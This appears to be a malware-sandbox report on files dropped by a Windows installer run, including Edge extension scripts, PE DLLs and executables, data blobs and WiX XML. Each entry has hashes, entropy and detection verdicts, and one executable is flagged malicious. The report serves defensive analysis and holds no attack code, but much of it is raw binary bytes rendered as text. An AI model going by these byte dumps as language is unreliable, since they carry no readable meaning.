                                                                                                                                                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):10388
                                                                                                                                                                Entropy (8bit):6.174387413738973
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):962
                                                                                                                                                                Entropy (8bit):5.698567446030411
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                Process:C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2598912
                                                                                                                                                                Entropy (8bit):6.6049974235008655
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:VTFgiFpGXOENKSgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07/:V+iDaWjxJsv6tWKFdu9CZgfQ
                                                                                                                                                                MD5:FECC62A37D37D9759E6B02041728AA23
                                                                                                                                                                SHA1:0C5F646CAEF7A6E9073D58ED698F6CFBFB2883A3
                                                                                                                                                                SHA-256:94C1395153D7758900979351E633AB68D22AE9B306EF8E253B712A1AAB54C805
                                                                                                                                                                SHA-512:698F90F1248DACBD4BDC49045A4E80972783D9DCEC120D187ABD08F5EF03224B511F7870320938B7E8BE049C243FFB1C450C847429434EF2E2C09288CB9286A6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............,..,..,J.,,..,.<*,..,.<(,..,..7,..,..',..,..,..,.<.,...,.<.,...,.</,..,.<.,..,.<),..,Rich..,........................PE..L...T..Q...........!................B..............g..............U...........'......;(...@...........................!.<x..<.!.......&.......................&....................................... .@...............(............................text.............................. ..`.rdata..<...........................@..@.data....2...p&..*...Z&.............@....rsrc.........&.......&.............@..@.reloc........&.......&.............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):8581632
                                                                                                                                                                Entropy (8bit):6.736578346160889
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
                                                                                                                                                                MD5:831BA3A8C9D9916BDF82E07A3E8338CC
                                                                                                                                                                SHA1:6C89FD258937427D14D5042736FDFCCD0049F042
                                                                                                                                                                SHA-256:D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
                                                                                                                                                                SHA-512:BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t...t...t......p.....u...oq.|...}...q...oq.r...}..c...t.~.....oq.i...oq.....oq.u...oq.u...oq.u...Richt...........PE..L......Q...........!......Y...).....2.S.......Y....e..............U..........P............@...........................m..c...Ul.,.....{.......................{..O..................................x'e.@.............Y..............................text...K.Y.......Y................. ..`.rdata....!...Y...!...Y.............@..@.data...t.....z.......z.............@....rsrc.........{......r{.............@..@.reloc...y....{..z...x{.............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1053696
                                                                                                                                                                Entropy (8bit):6.539052666912709
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
                                                                                                                                                                MD5:8A2E025FD3DDD56C8E4F63416E46E2EC
                                                                                                                                                                SHA1:5F58FEB11E84AA41D5548F5A30FC758221E9DD64
                                                                                                                                                                SHA-256:52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
                                                                                                                                                                SHA-512:8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D.....u...u...u......u..>....u..>....u..>....u...t.".u.......u..>.._.u..>....u..>....u..>....u.Rich..u.........PE..L......Q...........!.....x...........J.............d..............U..........`......I.....@.........................P.......43..d............................ ..........................................@............................................text....v.......x.................. ..`.rdata..H>.......@...|..............@..@.data...8=..........................@....rsrc...............................@..@.reloc...9... ...:..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):356352
                                                                                                                                                                Entropy (8bit):6.447802510709224
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
                                                                                                                                                                MD5:E9A9411D6F4C71095C996A406C56129D
                                                                                                                                                                SHA1:80B6EEFC488A1BF983919B440A83D3C02F0319DD
                                                                                                                                                                SHA-256:C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
                                                                                                                                                                SHA-512:93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......GN.f./.5./.5./.5.W>5./.5.a55./.5..35./.5...5./.5..15./.5./.5...5...5./.5..65./.5..75./.5..05./.5Rich./.5........PE..L...Y..Q...........!.....v..........Z..............a..............U..................k....@..........................w..\...LL..d....0.......................@..hR..................................p...@...............p............................text....t.......v.................. ..`.rdata..............z..............@..@.data........ ......................@....rsrc........0......................@..@.reloc..la...@...b..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):6487736
                                                                                                                                                                Entropy (8bit):7.518089126573906
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:98304:u4bRxuHuFP2rHLpHPA477yNRgoPbfnRROWR721LYfs17u0kcFrXLEJfwY:u4NxuOFI1AEyrbf/52BYfs1LkcFrXL+X
                                                                                                                                                                MD5:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                SHA1:A150FA871E10919A1D626FFE37B1A400142F452B
                                                                                                                                                                SHA-256:421E36788BFCB4433178C657D49AA711446B3A783F7697A4D7D402A503C1F273
                                                                                                                                                                SHA-512:3973C23FC652E82F2415FF81F2756B55E46C6807CC4A8C37E5E31009CEC45AB47C5D4228C03B5E3A972CACD6547CF0D3273965F263B1B2D608AF89F5BE6E459A
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2/m.vN..vN..vN......wN..m..pN..m..zN...6..wN..m..cN...6..aN..vN...J..m..xN..m..$N..m..wN..m..wN..RichvN..................PE..L......e.................(....Z......Y.......@....@..........................0c.......c...@..................................b_.h.....`.8.............b.. ....b.X...PT..............................x.^.@............@..l............................text...r&.......(.................. ..`.rdata....W..@....W..,..............@..@.data...xM...0`.."....`.............@....rsrc...8.....`......<`.............@..@.reloc........b.......a.............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):664064
                                                                                                                                                                Entropy (8bit):6.953961612144461
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:c/gzbnbASodCXNn5FJX5KLN9VmoBBDFyn/:kRSoSn5FJX5K59VmoDK
                                                                                                                                                                MD5:A147F46E2E1F315AA219482D645BEED9
                                                                                                                                                                SHA1:073A6AE153A903B31463FA33512AA93DA1E3BB6F
                                                                                                                                                                SHA-256:2EB33D31364355ACBA660487F3747A9899DBDEB2221C58EB2BF916E53267DBC4
                                                                                                                                                                SHA-512:690DD6A959C6043EFE48ECB840C6353B2CE5F95372933A7201959C5A2075657EE2B02921685EAF23AE0EC228ABD86AA24F7CB11A9F089EB49D20F6AB6C46E3B8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.3 ".]s".]s".]s.R s#.]s.R0s#.]s..s .]s..s+.]s".\s..]s+..s9.]s+..s..]s+..sq.]s+..s#.]s+..s#.]s+..s#.]sRich".]s........................PE..L.....NK...........!.....R...................p.......................................J....@..........................*..C6......d................................B..@................................K..@...........X................................text...SP.......R.................. ..`.data...l|...p...T...V..............@....idata..............................@....rsrc...............................@..@.reloc...d.......d..................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60283
                                                                                                                                                                Entropy (8bit):4.569551839311306
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:JLFhcTCRX7325Q72JnHi/KPHVzwrU60mYuBYdoQ:hIC173hknmqBrRmzB9Q
                                                                                                                                                                MD5:3620E2D48EB60EC875FB9262ABC87D2B
                                                                                                                                                                SHA1:55C7CE6E00901BE5090D7D1ACFF47D30436FA5EF
                                                                                                                                                                SHA-256:E8E6F472277E0F3EE5B6640B0EC436029AF329E37F0C84978399DEB38768BEB1
                                                                                                                                                                SHA-512:CBE8C6BE90FD75EE9D0A912E832ED784C4273B495EE1246B97601A6FA24FA4CE6FB07BE97508DA4FA249F05C96D5A86DA1805099C06EDD1CA81E726954025DD9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.M.kZ.u_aUO......KUF...ABb..F..u.]F.rV..f..t..qm.Z_C....a._rAHlPTAnm.XL...Bp\h.BD.nd..p.x..W.k..T]w.nn.l.xQ.NE.B.b.dF...K.V]j..Yr.A.t..O_mrdES_Ww.Wg.P.....vq.I.BT..f.Jm.xxf.....V.kU..HiyRuFEC`.....y...`cgmo.....Pk....UbG..GQ..N.o...wA^.A..K.J.Iv...xvp].Sh...Gh.F...OmAZdJ...c.....ftg...Bc....lKWOSh..[..j...h...Ra..If...oA.r.itG....x_m...K.........HV.mW.S..X.soGI[F.AavnVBbsd.W.hE..b^...kE.B.D.[.E......lsxC..rJUb.Ts.P....M.`[p...w.F...Mv...sJ.h.Gpc...PF.^.V^J..Q.j.JI.....r..aI.K.OSl..eU\vo.v...K.x..aR.h...h..R.N.sQ...Y.....K.B....VdiHm...s........_......w.^RY`.o`H.WT.sJ.is...]..^A]Z....k.KJ..s...p.F...l..........f.wq\g....MRl..a..o....cZ].`.D.w._g.g.X.b...WdC.GLeCj[.y...HR..mG.V.k...v..YA.KPhvtC..v.gpnBw..m....]..V.f...`..W..T.QnMk.sZ.We...u.^.h^....A.C....W.ww..H...y.m..Py..jV.rOgkpnaCm.....jZL..Xo...hS......Ao..e\^y]...PS.EMf.^k.Uu.TmO..\\WsQ.T..u.w.qAq`x\..m.S]Z.......po...^H\nphxx.y..Z.X.Zs........oO.r.m..vh.W.k....mBMw.JJ.hc...p].[........n..nI...R...MU.F.v.w......s..[C...LU...C..y.J
                                                                                                                                                                Process:C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):421200
                                                                                                                                                                Entropy (8bit):6.59808962341698
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
                                                                                                                                                                MD5:03E9314004F504A14A61C3D364B62F66
                                                                                                                                                                SHA1:0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
                                                                                                                                                                SHA-256:A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
                                                                                                                                                                SHA-512:2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._d..17..17..17...7..17..7..17..07 .17(..7..17..7..17..7..17..7..17..7..17..7..17..7..17..7..17Rich..17........................PE..L.....K.........."!.................<.............x......................................@.................................`...<.... ...............V..P....0..H;..p................................/..@...............p............................text............................... ..`.data...$:.......,..................@....rsrc........ ......................@..@.reloc...S...0...T..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):770384
                                                                                                                                                                Entropy (8bit):6.908020029901359
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
                                                                                                                                                                MD5:67EC459E42D3081DD8FD34356F7CAFC1
                                                                                                                                                                SHA1:1738050616169D5B17B5ADAC3FF0370B8C642734
                                                                                                                                                                SHA-256:1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
                                                                                                                                                                SHA-512:9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ R.HA<.HA<.HA<.A9..KA<.HA=..A<.'7..@<.'7...A<.'7..|A<.'7...A<.'7..IA<.'7..IA<.'7..IA<.RichHA<.........PE..L.....K.........."!................. ....... .....x.................................S....@..........................I......D...(.......................P....... L..h...8...........................pE..@............................................text............................... ..`.data...|Z... ...N..................@....rsrc................X..............@..@.reloc.. L.......N...\..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4485813
                                                                                                                                                                Entropy (8bit):7.960501110953352
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:98304:zvf5BQTYhbOg6IdJogvR31mRCbJ2O4qm08UhFdFtZ7C5Bd6wKWgSKNKk8R:zvhy2cW31mRCbEqf8UhFiBdQ+kO
                                                                                                                                                                MD5:B56FE6EA5F9CAFB0C73A95A3377C8CA1
                                                                                                                                                                SHA1:252F48E39D28A5554152F32F23A406E4E9E752DD
                                                                                                                                                                SHA-256:04C5B808B740AC5F17B12956AD0D1B2C21EA1D6A6011275AC2A0D08B454EDB6A
                                                                                                                                                                SHA-512:1A094CD5029F1D2BD0E804EC7F1911CF25CE319BEF3EB03BC57DF09A5BCF5957C813F9F7FF57B936F0596E0E00F3B447E2E2C3B5BAE9F3AD99BEB63C441DC0D7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.b...C.y.y.m..L......\^..n.N.HQ..n.Eh.....l..q.JY.kE....peI.k.c..mE..c.Lr\p...ZTW.X.qo.s.x..HHb.f.aq..s.\E^^mYoR_Cb...].xBM.xR.[.kpg.MGx_.x.Xkx..._...jilM.[.CAm....tV...wtM...ywlI..yU.S.WQHig..w.].Sx_QX]...LLL_sC.P.y.pj.TgH.C..dOC.RqnoF....Qv.....b.m..M.]X.L.hvbeZ..f.ma....tNrr.Cbe..S..Yvnjbh...C..mqWsjglcP.W.Mu.TIq..fYcf.K..WbMIp...IRn[.G..Y..V.._..]..L].U...L]O..L.uHt`.._VBuVd.hK.DhxRlwPY[...xo....F^SLA.....[gXWLVF.......wX.w.b...nlUr.E.D...UN.f..JM.f.T.CF.....yO.RmS]..d.^e...O..b.^\K^.......kc[U...yfym...Vc..a.oUd.rD.kDWFLcL.UIZM.cfQK.e^..hvr.oxq.FI..QNP...LQT..q...h..i_.hA.mu.d......HKg.UK...tL...x...q^...h.._.q.LT.g.t]do.BM.S.HKj[..q..R.[O^.E.IV.v..hfA.mh..^N..h.......Th..shY...xLOtm\Jl.\fZ..g.b.b.`....A.ao.f..^.y...of...B..y....R..W.P..nYuE..F.X...Wv.V..\^.rR.^..X....]gxml.ukp.Vc.f.F..A...K....Pix.IObhW_^C...^.....A.y..QUH.vg.W\o..hZ......MM....gK..L..m...E..T.O.i....pNt.Y..J...tD.n_...]JEfbw.p...f.^^.I..Y..L..QJb.M.i.H..........q..u..W^...Kv.T.y..fCeqB.l......bDm...._xd.].p.l..U
                                                                                                                                                                Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):474056
Entropy (8bit):6.5454050911466695
Encrypted:false
SSDEEP:12288:ljzSlYxJd1mGgLzDxlzLIQNO1fc2G0LqR6tA15/5K+su:BzMz/VNUch0LqR6850lu
MD5:494C74C13C1E2E81E77240CC64F09206
SHA1:19C172D3B470F199EA50F7E71104CF30C538F351
SHA-256:DD8FA081CA5F7238C755C9D6E42F5A8ACA6F90B10412D4092EDA1DE6F76D8FF7
SHA-512:D76FA86BA474935809A057082E0C41C3CC7008477D0D8A035C4E77245BEBD9051B329BC07FD44FEC0FCF18B0C0779D60A497B36818C4A9815D7942DF8BE71672
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (450), with CRLF line terminators
Category:dropped
Size (bytes):2384
Entropy (8bit):3.7598071625620997
Encrypted:false
SSDEEP:48:y+03N6hOOvpEkwcne1LaJVc0wkycmeRPwJvgkWHmi1qrBZi1Hymrcl:Rwcn6Lwc0wkyc/Puvgk/WqrBZWSmrq
MD5:31320EA56CB0843809C37D1C6F0D6AF1
SHA1:53176DCF526AFADC71815A2A8404AFEC35C5452C
SHA-256:470FF6E6A66EDCA04C8E9525B22B2B8E8F94C7CDB814EA2CCDB037E276B2F6D8
SHA-512:75C0C4F7CC2A5E1424CFE3970F0DEC1394E21EC316D247ED0B78DAC8E03FABE46E290692B70C7707F85AA63F6F2DD75C0302237D8A5677E2A753AA60465D38E2
Malicious:false
Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.w.i.x.t.o.o.l.s.e.t...o.r.g./.s.c.h.e.m.a.s./.v.4./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.W.i.x.B.u.n.d.l.e.P.r.o.p.e.r.t.i.e.s. .D.i.s.p.l.a.y.N.a.m.e.=.".R.u.b.r.i.c.i.a.n.". .L.o.g.P.a.t.h.V.a.r.i.a.b.l.e.=.".W.i.x.B.u.n.d.l.e.L.o.g.". .C.o.m.p.r.e.s.s.e.d.=.".n.o.". .I.d.=.".{.7.3.F.A.9.7.B.8.-.5.F.C.7.-.4.3.D.A.-.9.8.3.E.-.7.E.C.4.0.2.A.0.4.6.D.6.}.". .U.p.g.r.a.d.e.C.o.d.e.=.".{.0.8.6.0.9.1.1.9.-.8.A.3.0.-.4.1.2.6.-.9.3.3.A.-.7.6.D.5.0.C.9.A.E.8.3.7.}.". .P.e.r.M.a.c.h.i.n.e.=.".y.e.s.". ./.>..... . .<.W.i.x.R.o.l.l.b.a.c.k.B.o.u.n.d.a.r.y. .I.d.=.".W.i.x.D.e.f.a.u.l.t.B.o.u.n.d.a.r.y.". .V.i.t.a.l.=.".y.e.s.". .T.r.a.n.s.a.c.t.i.o.n.=.".n.o.". ./.>..... . .<.W.i.x.P.a.c.k.a.g.e.P.r.o.p.e.r.t.i.e.s. .P.a.c.k.a.g.e.=.".P.a.x.w.a.x.". .V.i.t.a.l.=.".y.e.s.". .D.i.s.p.l.a.y.N.a.m.e.=.".

Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):252
Entropy (8bit):3.50802487441866
Encrypted:false
SSDEEP:6:QFulcLk0YR5Ie8GcUlLulFwENeWlYmH1fMWGVUlLulFwEnk:QF/LXYRWe8OLqF3Ye1kWGaLqFhk
MD5:A35990570AFAA7D023FD2EBBE229AFB8
SHA1:86688B13D3364ADB90BBA552F544D4D546AFD63D
SHA-256:9B696AD0EC3B37BAC11DA76BCD51AD907D31EE9638DAD7BB8FDD5AEF919EF621
SHA-512:1845B25697FED6D694428F53B2D1B2ABF1ACF8A09E8E49A536759822AD5B1A75D51BC7AE4D73E435B7BBC23AC34C9AED76F17414D218B54DA546C908F9A5182C
Malicious:false
